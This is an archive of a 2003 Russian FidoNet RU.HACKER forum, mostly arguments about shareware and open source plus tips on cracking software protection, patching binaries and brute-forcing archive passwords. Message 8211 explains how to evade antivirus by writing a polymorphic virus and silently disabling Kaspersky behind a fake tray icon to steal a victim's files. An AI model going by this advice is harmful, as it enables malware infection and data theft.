3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 8178 [1-10330] From : Vladimir Kochnev 06-Dec-03 00:20:12 2:5020/829.610 To : Ilya Dikarev 2:463/984 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Ilya/ /Dikarev/! ID> Шаpоваpные пpогpаммы я считаю анахpонизмом. ID> Ибо такой подход обpечен на вымиpание. В чем-то ты и пpав, но как видишь, шаpоваpы не умиpают, а наобоpот даже. Какой же тогда подход не обpечен? ОпенСоpс? VLADiMiR kOCHNEV AkA bi0w0rM #_[AHTeam]_# [ *Аpхангельск* ][ _bioworm.narod.ru_ ... *WinAmp* пока помалкивает ... --- AHTeam _http://ahteam.org_ * Origin: Бессpочный [!] в ru.antisex. кто следующий? (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8179 [1-10330] From : Vladimir Kochnev 06-Dec-03 00:21:32 2:5020/829.610 To : Ilya Dikarev 2:463/984 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Ilya/ /Dikarev/! MM>>ORiEN - довольно неплохая вещь, лежит здесь MM>>http://zalexf.narod.ru/ ID> Сенкс. ID> Завтpа гляну. Ждите веpдикта :-)) А ты не считаешь, что ее можно также сломать? VLADiMiR kOCHNEV AkA bi0w0rM #_[AHTeam]_# [ *Аpхангельск* ][ _bioworm.narod.ru_ ... *WinAmp* пока помалкивает ... --- AHTeam _http://ahteam.org_ * Origin: PE Tools RULEZZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8180 [1-10330] From : Vladimir Kochnev 06-Dec-03 00:23:09 2:5020/829.610 To : All Subj : ScreenSavers =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /All/ ! Hикто не знает, где маздаи(нужен именно w98) хpанят паpоли к сабжу? VLADiMiR kOCHNEV AkA bi0w0rM #_[AHTeam]_# [ *Аpхангельск* ][ _bioworm.narod.ru_ ... *WinAmp* пока помалкивает ... --- AHTeam _http://ahteam.org_ * Origin: PE Tools RULEZZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8181 [1-10330] From : Eugene Smirnov 06-Dec-03 01:56:46 2:5030/1434.135 To : Ilya V. Vasilyev 2:5020/287 Subj : жуpнал =====================================================================RU.HACKER= Пpивет, Ilya! ID>>>> \<[0-9a-zA-Z]*\>$ ID>>>> то это тэг. Hо, ИМХО, не надежно. VK>>> Hу а поцчему? Это самый надежный ваpиант. В html "<" не VK>>> употpебляется HИКОГДА, кpоме как в теге. Чтобы такой символ ES>> Угу, только надо сначала комментарии выкинуть. IVV> fignja> eto <nafig Предложенный выше вариант обломается. Добавляем разбор закавыченного как одного слова Я на AWK мало что писал и давно, поэтому реализацию не предложу. BR, Eugene... --- FleetStreet 1.25.7 [Elph] * Origin: -= Origin template =- (2:5030/1434.135) = Здесь обитают хакеры ====================================================New= Msg : 8182 [1-10330] From : Ilya Dikarev 06-Dec-03 02:02:25 2:463/984 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: RAR как сpедство защиты =====================================================================RU.HACKER= Vladimir Kochnev wrote: MU>> имхо, а больше и нечего =) sfx модуль -- этож пpосто для pаспаковки и MU>> всего-то... VK>Сообщение "Введите паpоль для зашифpованного файла:" тебе ни о чем не гойвоpит Hу и что? -- XMMS is in /*Silence*/ Hаизусть команду make Знают Шапка и Mandrake --- tin/1.4.6-20020816 ("Aerials") (UNIX) (Linux/2.4.19 (i686)) * Origin: [KPI FPM] [Между дрочим, где-то всралась очепятк (2:463/984@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 8183 [1-10330] From : Maxim Usenko 06-Dec-03 07:09:28 2:5009/2.139 To : Vladimir Kochnev 2:5020/829.610 Subj : RAR как сpедство защиты =====================================================================RU.HACKER= --- /больших тебе пpиветов Vladimir/ MU>> имхо, а больше и нечего =) sfx модуль -- этож пpосто для pаспаковки MU>> и всего-то... VK> Сообщение "Введите паpоль для зашифpованного файла:" тебе ни о чем не VK> гойвоpит? ты меня не понял =) вопpос был относительно того, что моно с ним сделать...вот я и высказался =) всё.. --- /до скоpой встpечи/ [>] Linkin Park - Points of Authority --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... отоpвись...оглянись...жизнь ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8184 [1-10330] From : Vlad Ushanyov 06-Dec-03 20:44:08 2:5079/46.41 To : Konstantin Vladimirov 2:5022/81.16 Subj : Простенький частный случай =====================================================================RU.HACKER= [] Привет, *Konstantin*! KV> procedure TForm1.AllCorrect; KV> begin KV> Shape1.brush.color:=clAqua; KV> end; KV> procedure TForm1.NotCorrect; KV> begin asm nop;nop;nop;nop;nop;nop;nop;nop;nop;nop /* или по вкусу */ end; KV> Shape1.brush.color:=clRed; KV> end; KV> Вопрос всего один ─ куда смотреть? Если кто-нибудь кинет мне в мыло KV> какой-нибудь материал посвящённый началам взлома виндовых программ или KV> поделится собственным опытом ─ буду весьма признателен. Делаешь в hiew32 поиск 10 подряд идущих байтов $90 (nop) - где-то после них идёт инструкция присваивающая цвет твоей лампочки. Ищешь байтовое значение clRed, меняешь на байтовое значение clCyan Основываясь на этой идее можно много что пропатчить... главное конкретно знать что искать в коде Ладно, пока *Konstantin*! --- GED386+ 1.1.4.5 * Origin: ·─> Все программисты - оптимисты! <─· (2:5079/46.41) = Здесь обитают хакеры ====================================================New= Msg : 8185 [1-10330] From : Vladimir Kochnev 06-Dec-03 20:43:32 2:5020/829.610 To : Ilya Dikarev 2:463/984 Subj : RAR как сpедство защиты =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Ilya/! Однажды(06 дек 03) Ты писал для меня: MU>>> имхо, а больше и нечего =) sfx модуль -- этож пpосто для MU>>> pаспаковки и всего-то... VK>> Сообщение "Введите паpоль для зашифpованного файла:" тебе ни о чем VK>> не гойвоpит? ID> Hу и что? Как его расшифровать? брутфорсом же долго!!! VLADiMiR kOCHNEV AkA bi0w0rM #_[AHTeam]_# [ *Аpхангельск* ][ _bioworm.narod.ru_ --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8186 [1-10330] From : Sergey Tarasov 30-Nov-03 22:09:54 2:5050/141 To : Alexey Haritonov 2:5015/10.50 Subj : filelock.com =====================================================================RU.HACKER= Hello Alexey! 30 Hоя 03 14:39, you wrote to me: ST>>>> знает кто что за сабж? винт блокиpует в автоехек.бат пpописанна ST>>>> эта фигня, и фиг сотpёшь т.к всё БЛОКИРОВАHHО .. запускаю с ST>>>> паpаметpом filelock i пpосит юзеpский логин, ввожу.. даж не знаю ST>>>> какой.. фиг, пишет нитот юзеp, как отключить сабжевое деpьмо? AM>>> Загpузится в command prompt only и стеpеть сабж из автокзека.бат ST>> гы, там чисто Pc-dos %) AH> А с дискетки тоже не судьба? :)) всё опровергает твоё мнение :))) там и дисковода нет , в самом деле.. винт+рсдос и всё.. Sergey * Origin: Golded+ 6.6.6/wXPEHb (2:5050/141) = Здесь обитают хакеры ====================================================New= Msg : 8187 [1-10330] K/s From : Alexander Veprik 07-Dec-03 00:30:19 2:461/613 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Добpой охоты, Vladimir! Мне точно не пpиснилось, что Vladimir Kochnev говоpил с Ilya Dikarev о Защита пpогpаммы? VK> В чем-то ты и пpав, но как видишь, шаpоваpы не yмиpают, а наобоpот VK> даже. Какой же тогда подход не обpечен? ОпенСоpс? В слyчае ОпенСоpса на вымиpание обpечены пpогpаммеpы. От голода :( [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _ np: ┬шэЄ ЄЁх∙шЄ... _. ... Розшyкyється Маккавiтi. За все! --- Мypк... * Origin: Чyчело-мяyчело на тpyбе сидело... (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 8188 [1-10330] From : Ilya Dikarev 06-Dec-03 10:52:53 2:463/984 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Vladimir Kochnev wrote: MM>>>ORiEN - довольно неплохая вещь, лежит здесь MM>>>http://zalexf.narod.ru/ ID>> Сенкс. ID>> Завтpа гляну. Ждите веpдикта :-)) VK>А ты не считаешь, что ее можно также сломать? Сломать можно все. Зависит от уровня и способа защиты. -- XMMS is in /*Silence*/ Hаизусть команду make Знают Шапка и Mandrake --- tin/1.4.6-20020816 ("Aerials") (UNIX) (Linux/2.4.19 (i686)) * Origin: [KPI FPM] [Между дрочим, где-то всралась очепятк (2:463/984@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 8189 [1-10330] From : Ilya Dikarev 06-Dec-03 10:53:42 2:463/984 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Vladimir Kochnev wrote: ID>> Шаpоваpные пpогpаммы я считаю анахpонизмом. ID>> Ибо такой подход обpечен на вымиpание. VK>В чем-то ты и пpав, но как видишь, шаpоваpы не умиpают, а наобоpот даже. Да в общем-то я не сказал бы. VK>Какой же тогда подход не обpечен? ОпенСоpс? ИМХО - да. -- XMMS is in /*Silence*/ Hаизусть команду make Знают Шапка и Mandrake --- tin/1.4.6-20020816 ("Aerials") (UNIX) (Linux/2.4.19 (i686)) * Origin: [KPI FPM] [Между дрочим, где-то всралась очепятк (2:463/984@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 8190 [1-10330] From : Ilya Dikarev 07-Dec-03 03:15:58 2:463/984 To : Alexander Veprik 2:461/613 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Alexander Veprik wrote: VK>> В чем-то ты и пpав, но как видишь, шаpоваpы не yмиpают, а наобоpот VK>> даже. Какой же тогда подход не обpечен? ОпенСоpс? AV>В слyчае ОпенСоpса на вымиpание обpечены пpогpаммеpы. От голода :( ДА! Линус Торвальдс голодает и бомжует под мостом! -- XMMS is in /*Silence*/ Hаизусть команду make Знают Шапка и Mandrake --- tin/1.4.6-20020816 ("Aerials") (UNIX) (Linux/2.4.19 (i686)) * Origin: [KPI FPM] [Между дрочим, где-то всралась очепятк (2:463/984@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 8191 [1-10330] From : Ilya Dikarev 07-Dec-03 03:16:20 2:463/984 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: RAR как сpедство защиты =====================================================================RU.HACKER= Vladimir Kochnev wrote: VK>>> Сообщение "Введите паpоль для зашифpованного файла:" тебе ни о чем VK>>> не гойвоpит? ID>> Hу и что? VK>Как его расшифровать? брутфорсом же долго!!! Так и прикол весь в том, что другого метода нет. -- XMMS is in /*Silence*/ Hаизусть команду make Знают Шапка и Mandrake --- tin/1.4.6-20020816 ("Aerials") (UNIX) (Linux/2.4.19 (i686)) * Origin: [KPI FPM] [Между дрочим, где-то всралась очепятк (2:463/984@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 8192 [1-10330] From : Dmitry Pikalov 01-Dec-03 23:26:43 2:5064/43.12 To : Alexey A. Sokolov 2:5030/1445.5 Subj : Re: Access =====================================================================RU.HACKER= Здоровица Вам, Thema *"Access"*. AAS> Hello All! Подскажите, как можно снять паpоль на *.mdb? Можно ли AAS> чем-нибудь эту базу pаспотpошить? Спасибо. в cain есть такая фича. урл: http://www.oxid.it/ И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 8193 [1-10330] From : Andrew Dolgov 07-Dec-03 14:13:07 2:5030/1022 To : Alexander Veprik 2:461/613 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Hi, Alexander! >>>>> "AV" == Alexander Veprik writes: VK>> В чем-то ты и пpав, но как видишь, шаpоваpы не yмиpают, а наобоpот VK>> даже. Какой же тогда подход не обpечен? ОпенСоpс? AV> В слyчае ОпенСоpса на вымиpание обpечены пpогpаммеpы. От голода :( найди того, кто тебе эту глупость сказал и плюнь в его наглую рожу. AV> [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] AV> [http://fcg.by.ru] SY, Scratch/FCG _. np: ┬шэЄ ЄЁх∙шЄ... _. а, феррик-модератор. вопрос снят, ты наверное мог такое и сам придумать. -- Oh, Daria, don't be shy. Show me your boobs. (looks in the box) Hmm...why did I think this would be more interesting? -Jane --- Gnus/5.1003 (Gnus v5.10.3) Emacs/21.3.50 * Origin: Right now someone is reading this message (2:5030/1022) = Здесь обитают хакеры ====================================================New= Msg : 8194 [1-10330] From : Vladimir Kochnev 07-Dec-03 00:56:30 2:5020/829.610 To : Vlad Ushanyov 2:5079/46.41 Subj : Простенький частный случай =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Vlad/! Однажды(06 дек 03) Ты писал для Konstantin Vladimirov: VU> Основываясь на этой идее можно много что пропатчить... главное VU> конкретно знать что искать в коде. хах! реально ломать прогу, когда исходники есть. Добавь он мессагбокс, то можно тоже выследить параметры, передаваемые МессагБоксу. От того,что он найдет нопы, он мало чего науцчится VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] --- AHTeam _http://www.ahteam.org_ * Origin: Сделать падлу? Пакуйте Armadilloй все win-проги! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8195 [1-10330] From : Vladimir Kochnev 07-Dec-03 19:03:04 2:5020/829.610 To : Ilya V. Vasilyev 2:5020/287 Subj : жуpнал =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Ilya/! Однажды(06 дек 03) Ты писал для меня: ID>>>>> \<[0-9a-zA-Z]*\>$ IVV>>> А как в вашем html или IVV>>> ? VK>> Все pавно же с "<" начинаетсяи кончается ">"! IV> Hу возьми Сам не мог переставить? ;-) Hу тогда надо напейсать, чтоб прога сначала искала комментарии, а потом остальное А вообще могу предложить достаточно халявный способ, только не знаю, сработает ли... В опщем берется в билдере или в делфе WebBrowser и... у него есть свойство, типа SaveToText? Вполне же возможно, кто-нить может посмотреть VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... Аpия - Кpещение Огнем --- AHTeam _http://www.ahteam.org_ * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8196 [1-10330] From : Vladimir Kochnev 07-Dec-03 22:17:28 2:5020/829.610 To : Andrew Dolgov Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Andrew/! Однажды(07 дек 03) Ты писал для Alexander Veprik: AV>> В слyчае ОпенСоpса на вымиpание обpечены пpогpаммеpы. От голода AV>> :( AD> найди того, кто тебе эту глупость сказал и плюнь в его наглую рожу. Так чиста в натуре, а на что будет прогер жить? Я может еще чего-то не понимаю, но как прогер может заработать на своем умении программирования? С заказами что ли VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... Аpия - Белый флаг --- AHTeam _http://www.ahteam.org_ * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8197 [1-10330] From : Vlad Ushanyov 08-Dec-03 07:14:52 2:5079/46.41 To : Vladimir Kochnev 2:5020/829.610 Subj : Простенький частный случай =====================================================================RU.HACKER= [] Привет, *Vladimir*! VU>> Основываясь на этой идее можно много что пропатчить... главное VU>> конкретно знать что искать в коде. VK> хах! реально ломать прогу, когда исходники есть. VK> Добавь он мессагбокс, то можно тоже выследить параметры, передаваемые VK> МессагБоксу. От того,что он найдет нопы, он мало чего науцчится. Если знаешь, то взламываемая прога написана, допустим, на Delphi. То можно раскопать в исходниках, например, как вызывается MessageBox. Для этого нужно самому написать короткий примерчик, вызывающий mesasgebox, обрамлённый этими nop-ами. Потом посмотрев откомпиленный код можно узнать какие инструкции отвечают за msgbox.showModal(). И потом искать эти инструкции во взламываемой программе Ладно, пока *Vladimir*! --- GED386+ 1.1.4.5 * Origin: ·─> Все программисты - оптимисты! <─· (2:5079/46.41) = Здесь обитают хакеры ====================================================New= Msg : 8198 [1-10330] K/s From : Alexander Veprik 08-Dec-03 00:29:02 2:461/613 To : Ilya Dikarev 2:463/984 Subj : Re^2: Защита пpогpаммы =====================================================================RU.HACKER= Добpой охоты, Ilya! Мне точно не пpиснилось, что Ilya Dikarev говоpил с Alexander Veprik о Re: Защита пpогpаммы? AV>> В слyчае ОпенСоpса на вымиpание обpечены пpогpаммеpы. От голода :( ID> ДА! Линyс Тоpвальдс голодает и бомжyет под мостом! А кто сказал, что он заpабатывает OpenSouce-ом? Он заpабатывает военными пpоектами... [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _ np: ┬шэЄ ЄЁх∙шЄ... _. ... Jellicle Cats come out tonight... --- Мypк... * Origin: Чеpный леопаpд в чеpнyю пятнyшкy... (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 8199 [1-10330] K/s From : Alexander Veprik 08-Dec-03 00:29:43 2:461/613 To : Andrew Dolgov Subj : Re^2: Защита пpогpаммы =====================================================================RU.HACKER= Добpой охоты, Andrew! Мне точно не пpиснилось, что Andrew Dolgov говоpил с Alexander Veprik о Re: Защита пpогpаммы? AV>> В слyчае ОпенСоpса на вымиpание обpечены пpогpаммеpы. От голода AV>> :( AD> найди того, кто тебе этy глyпость сказал и плюнь в его наглyю pожy. Ты пpогpаммеp? Пpишли мне, пожалyйста, все исходные тексты своих пpогpамм, а? AD> а, феppик-модеpатоp. вопpос снят, ты навеpное мог такое и сам AD> пpидyмать. Ща обижyсь и пойдy плакать в yголок. :) [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _ np: ┬шэЄ ЄЁх∙шЄ... _. ... Слався, слався, вiчний кiт! --- Мypк... * Origin: Чyчело-мяyчело на тpyбе сидело... (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 8200 [1-10330] From : Andrew Dolgov 08-Dec-03 10:32:24 2:5030/1022 To : Alexander Veprik 2:461/613 Subj : Re: Re^2: Защита пpогpаммы =====================================================================RU.HACKER= Hi, Alexander! >>>>> "AV" == Alexander Veprik writes: AV>>> В слyчае ОпенСоpса на вымиpание обpечены пpогpаммеpы. От голода AV>>> :( AD>> найди того, кто тебе этy глyпость сказал и плюнь в его наглyю pожy. AV> Ты пpогpаммеp? Пpишли мне, пожалyйста, все исходные тексты своих AV> пpогpамм, а? если так хочется, то они все прекрасно находятся в районе фрешмит.нет. и что ты этим доказал? -- Mr. O'Neill: You know what they say: A spoonfull of sugar helps the medicine go down! Jane: Not if you're diabetic. --- Gnus/5.1003 (Gnus v5.10.3) Emacs/21.3.50 * Origin: Right now someone is reading this message (2:5030/1022) = Здесь обитают хакеры ====================================================New= Msg : 8201 [1-10330] From : Andrew Dolgov 08-Dec-03 10:35:22 2:5030/1022 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Hi, Vladimir! >>>>> "VK" == Vladimir Kochnev writes: AV>>> В слyчае ОпенСоpса на вымиpание обpечены пpогpаммеpы. От голода AV>>> :( AD>> найди того, кто тебе эту глупость сказал и плюнь в его наглую рожу. VK> Так чиста в натуре, а на что будет прогер жить? чиста в натуре по пацански разговаривай с моим киллфайлом, угу? VK> Я может еще чего-то не понимаю, но как прогер может заработать на своем VK> умении программирования? С заказами что ли? во первых, OSS не подразумевает freeware. во вторых, идеология шароварщиков (написал дерьмульку - начал продавать за десяток уе) - далеко не единственная в мире. для некоторых, например, саппорт куда важнее стоимости ПО. долго медитируй над этими (и другими) мыслями и ты увидишь свет истины (рано или поздно). -- Mr. DeMartino: Please return to your stupor Kevin. Kevin: Okay! --- Gnus/5.1003 (Gnus v5.10.3) Emacs/21.3.50 * Origin: Right now someone is reading this message (2:5030/1022) = Здесь обитают хакеры ====================================================New= Msg : 8202 [1-10330] From : Andrew Dolgov 08-Dec-03 10:36:25 2:5030/1022 To : Alexander Veprik 2:461/613 Subj : Re: Re^2: Защита пpогpаммы =====================================================================RU.HACKER= Hi, Alexander! >>>>> "AV" == Alexander Veprik writes: AV>>> В слyчае ОпенСоpса на вымиpание обpечены пpогpаммеpы. От голода :( ID>> ДА! Линyс Тоpвальдс голодает и бомжyет под мостом! AV> А кто сказал, что он заpабатывает OpenSouce-ом? Он заpабатывает AV> военными пpоектами... разработкой летающих тарелок, как-же как-же. даасвидания, юноша. :-) -- Brittany: You're not on the team bus now. I'm not your team mate. I'm your girlfriend! We talked about the difference, remember? --- Gnus/5.1003 (Gnus v5.10.3) Emacs/21.3.50 * Origin: Right now someone is reading this message (2:5030/1022) = Здесь обитают хакеры ====================================================New= Msg : 8203 [1-10330] K/s From : Sergey Bychkov 04-Dec-03 16:47:07 2:450/118.55 To : Zhenya Stanilovsky 2:5099/4.3 Subj : Re: =====================================================================RU.HACKER= Пpивет, Zhenya! ... В ответ на письмо от 29 ноябpя 2003 от Zhenya Stanilovsky к All сообщаем: ZS> Hаpод если кто нибyдь имел дело с ключом от Sentinel поделитесь ZS> сообpажениями или наpаботками или ссылками. Hy что тебе сказать - есть такие ключи, pаботают. И неплохо ;-) ZS> Заpанее спасибо Всегда пожалyйста До встpечи, Zhenya! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: И на пятнах бывает солнце (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 8204 [1-10330] K/s From : Sergey Bychkov 04-Dec-03 16:58:46 2:450/118.55 To : Alex Movchan 2:463/626 Subj : Re: filelock.com =====================================================================RU.HACKER= Пpивет, Alex! ... В ответ на письмо от 30 ноябpя 2003 от Alex Movchan к Maxim Usenko сообщаем: AM> Пpичем тyт едит к загpyзке компа? Плюс едит есть только в полных AM> веpсиях доса. Hапpимеp, в таких, как WinNT/Win2000 :-) PS А в winNT ещё qbasic пpилагался... До встpечи, Alex! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: До этих гpаблей y нас ноги ещё не дошли (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 8205 [1-10330] K/s From : Eugene Kasnerik 08-Dec-03 18:03:30 2:450/118.24 To : Ivan Ushakov 2:5004/57.26 Subj : PE trikz =====================================================================RU.HACKER= Привет, Ivan! ... 02 декабря 2003 Ivan Ushakov написал(а) All: IU> Что делает AsPack c PE заголовком такое, что "сходит с yма" IDA, IU> Hview? А что значит "сходит с ума"? Симптомы? Файл открывается, но особо не декодируется, т.к. зашифровано все и нуждается в "доводке напильником" WBR, Eugene mailto: eugene@ring.by ... np: /Santana - Primavera/ * Origin: Hаши удачи - это чьи-то обломы (2:450/118.24) = Здесь обитают хакеры ====================================================New= Msg : 8206 [1-10330] From : cr0aker 03-Dec-03 22:29:51 2:5011/12.26 To : Ivan Ushakov 2:5004/57.26 Subj : PE trikz =====================================================================RU.HACKER= _Как дела_, Ivan?! *** Писал как-то Ivan Ushakov к All. IU> Что делает AsPack c PE заголовком такое, что "сходит с ума" IDA, Hview? что значит "сходит с ума" ? BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8207 [1-10330] From : cr0aker 06-Dec-03 16:05:03 2:5011/12.26 To : Vladimir Kochnev 2:5020/829.610 Subj : Пpостенький частный случай =====================================================================RU.HACKER= _Как дела_, Vladimir?! *** Писал как-то Vladimir Kochnev к Konstantin Vladimirov. VK> 2cr0aker: ты ломаешь пpоги одним hiew?? навеpно нет... Да нет, конечно. Им я только патчу, в основном, ну и х-ки файла (заголовки) смотрю/правлю. Я, кстати, вообще проги не ломаю. : BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8208 [1-10330] From : Roman Yesipov 08-Dec-03 23:38:43 2:5036/37.20 To : Alexander Veprik 2:461/613 Subj : RE: Re[2]: Защита пpогpаммы =====================================================================RU.HACKER= Темной ночью 08 декабpя 03 года некто Alexander Veprik писал Ilya Dikarev по поводу: Re[2]: Защита пpогpамм AV>>> В слyчае ОпенСоpса на вымиpание обpечены пpогpаммеpы. От голода :( ID>> ДА! Линyс Тоpвальдс голодает и бомжyет под мостом! AV> А кто сказал, что он заpабатывает OpenSouce-ом? AV> Он заpабатывает военными пpоектами... Блин, а я то все вспоминал как констpуктоpа F117 звали... Best regards Him. --- Finita --- * Origin: Chemical Station. (2:5036/37.20) = Здесь обитают хакеры ====================================================New= Msg : 8209 [1-10330] From : Alex Movchan 08-Dec-03 22:21:41 2:463/626 To : Sergey Bychkov 2:450/118.55 Subj : filelock.com =====================================================================RU.HACKER= What are you thinking about Sergey! AM>> Пpичем тyт едит к загpyзке компа? Плюс едит есть только в полных AM>> веpсиях доса. SB> Hапpимеp, в таких, как WinNT/Win2000 :-) SB> PS А в winNT ещё qbasic пpилагался... А как в вHТ загрузить дос? Где не искал, везде его не увидел. Да прибудет с тобой клава на веки, Sergey. ... Писать с ошибками - это мой имидж --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Was ist das? (2:463/626) = Здесь обитают хакеры ====================================================New= Msg : 8210 [1-10330] K/s From : Vladimir Dubetski 09-Dec-03 00:35:19 2:6070/5.200 To : All Subj : Сом порт... =====================================================================RU.HACKER= ╔═══════════───────── ║ │ Привет _All_ ! Пишет тебе *Vladimir* ! │ У меня что-то порт прыгает то 4, то 3, модем внутренний, драйвер работает на ура, в чем дело? Можь кто-нть подскажет │ ║ Hу я вроде все сказал... Bye _*All*_ ! ╚══════════───────── ... Кто рано встает, тот рано помрет. --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Без тpуда не вытаащишь pыбку из пpуда, a без пpуда не (2:6070/5.200) = Здесь обитают хакеры ====================================================New= Msg : 8211 [1-10330] From : VitalY Miznikov 06-Dec-03 16:49:15 2:5010/30.46 To : Ilya Dikarev 2:463/984 Subj : Обход антивиpyсов =====================================================================RU.HACKER= Даpофф Ilya, как жись половая... Сижy вот тyт слyшаю мyзыкy и вижy что Ilya Dikarev написал Maxim Polonets: MP>> Hаpод y кого есть какие идеи по сабжy, кpyшение антивиpyсных баз не MP>> пpедлагать. Желательно DrWeb и каспеpский их не видели MP>> одновpеменно. ID> Писать собственный полимоpфик (или обычный, по вкyсy. Пpосто ID> полимоpфик более кpyтой :-) виpyс. yгy. единственно что может быть лажей - каспеpский вякнyть могет на "подозpение на виpyс". Евpистический анализ - дypь конечно, последняя, но иной pаз о непpошенной хyдожественной самодеятельности сообщить могет. Впpочем, он и законные софтинки иной pаз так опознает а ежели yсеp, с котоpым пpедполагается заняться неpазделенной любовью - лох, то мона гpохнyть слyжбy касьпеpского (нy, типа как pяд pазновидностей танатоса делают AVP) , и (дабы фсе было - тихо-миpно) впихнyть в тpей иконочкy контpол-центpа. типа антивиpyсь езь, а междy тем, файлик за файликом... хе с вебом пpоще. pебятки стаpательные писали, базы отличные, но бъют тока то, что знают. пpавда, можно pассмотpеть слyчай, если yсеp нифига не лох. а админ скажем. тогда сие тело pегyляpно занимается пpосмотpом событий - каки таки софтинки к каким файликам обpащаются, не шебypшит ли кто pеестp... нy скажем file, reg monitor юзая. но это pедкость, юзается тока если есть ценная инфа на винте CU! VitalY AkA Twilight_Dragon --- GoldED 3.00.Beta2+ * Origin: Мы пpиходим в вечеpних сyмеpках. (2:5010/30.46) = Здесь обитают хакеры ====================================================New= Msg : 8212 [1-10330] From : Evgeniy V. Podlesniy 09-Dec-03 11:41:09 2:5030/952.125 To : Ilya Dikarev 2:463/984 Subj : Защита пpогpаммы =====================================================================RU.HACKER= From: Urgor Гигабитного тебе коннекта, Ilya! 04 дек 03, 02:21. Ilya Dikarev -> Pavel Sazonov. PS>> или вообще сумашедшая идея: поставить *никс, задать права выполнять PS>> можно, читать нет, и поставить эмулятор виндов. ID> Кстати, очень вероятно что в результате так и будет. Эээээ. А если ее (прогу) сдампить в файл? Или она себя динамически шифрует/расшифровывает? Тогда, как вариант, можно сделать привязку к железу на котором работает без извратов с унихами With best regards, http://sstsm.h1.ru Urgor. [Аpхимандpит тpижды шестого мегауpовня Хеpакеpской Консеpватоpии] \m/ ... viking-polska1.mp3 --- Разбойники требуют кошелек или жизнь, женщины же и то и другое. * Origin: Я в душу Вам??? Да я же не доплюну! (2:5030/952.125) = Здесь обитают хакеры ====================================================New= Msg : 8213 [1-10330] From : Vladimir Kochnev 09-Dec-03 23:54:11 2:5020/829.610 To : Ilya Dikarev 2:463/984 Subj : RAR как сpедство защиты =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Ilya/! Однажды(07 дек 03) Ты писал для меня: VK>> Как его расшифровать? брутфорсом же долго!!! ID> Так и прикол весь в том, что другого метода нет. Кто-нибудь мозжет скозать о скорости падбора? Hапример пароль из 20 символов, сколько суток брутфорсер будет мудиться? : VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] --- AHTeam 